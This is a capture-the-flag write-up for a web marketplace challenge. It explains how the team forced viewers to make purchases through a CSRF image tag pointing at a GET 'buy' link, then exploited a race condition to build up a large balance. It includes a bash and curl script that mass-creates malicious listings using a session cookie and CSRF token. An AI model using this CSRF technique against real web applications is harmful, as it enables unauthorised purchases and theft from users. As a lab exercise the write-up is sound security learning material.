Tags: http web 

Rating:

Description:

    Mr. Moneybags is taking a day off - but new users get $500 just for joining! I bet you could earn over $100,000 this way!
    server: http://172.31.1.55/

<h2>Exploration</h2>
Hitting the URL with a browser shows a simple web service with a registration link. Signup requires a username, a password, and a simple CAPTCHA.

After logging in, we were immediately redirected to a page with a grid of items for sale, which had already been exploited and stole most of our starting $500. As we were clicking around, an additional exploit seemed to steal our cookies by making a request to another server on the network.

Creating a new account, we used the Chrome debugging tools to artificially slow the network down to GPRS speeds, which allowed us to intercept the loggin redirection, which kept our account (and starting cash) secure.

Using our compromised account, we created a new listing, which required a title, description, a URL for an image, and the desired price of the item. The help text for the image suggested using a data URL.

Once our listing was created, we attempted to buy another listing, noting that the request was made via GET instead of POST.

<h2>Exploitation and Automation</h2>
Creating a new listing, we used the URL from the "Buy" button on our first listing as the image `src`, which rendered as `<img src="/listings/12345?buy=1" />`, causing the viewer to attempt to buy my first listing.

Looking at the `POST` message that was sent when submitting new listings, we noticed that the two pieces of identifying information required were `csrftoken` and a `cookie`.

Wrapping this up in a shell script, we ended up with:

    last=$(grep 'Location: ' last.txt)
    last=${last%/*}
    last=${last##*/}
    cost=100
    if [ ! -z "$1" ]; then
      cost="$1"
    fi

    token=I61EoRXcJ7zzOPkrV5nC0MJu3h6xhTOj
    sessionid=u6jyb7uiu5s38r6squc2eyappinykq9c
    curl -v 'http://172.31.1.55/listings/new/' \
        -H "Cookie: sessionid=$sessionid; csrftoken=$token" \
        -H 'Content-Type: application/x-www-form-urlencoded' \
        -H 'Referer: http://172.31.1.55/listings/new/' \
        --data 'name=sup&details=buybuybuy&image_src=%2Flisting%2F'"$last"'%3Fbuy%3D1&cost='"$cost"'&csrfmiddlewaretoken='"$token" \
        &> last.txt

    grep 'Location:' last.txt  # Show the link to the posting we just created

Running this in a bash loop created multiple new postings for $100 every second, flooding the board with our own listings.

Unfortunately, while we were getting some money using this strategy, we weren't getting very much.

Fortunately, we noticed a race condition when viewing many listings at once, such that the buyer ended up with a negative balance, and the seller ended up with a significant balance.

By bouncing our money back and forth between our two accounts, combined with more and more expensive listings, we were able to end the game with a balance of over $100,000 on one account, and -$60,000 on the other account.

Once we had accumulated enough money, we were presented with the flag `red_herrings_are_tasty` at the top of the page.

Answer:

    red_herrings_are_tasty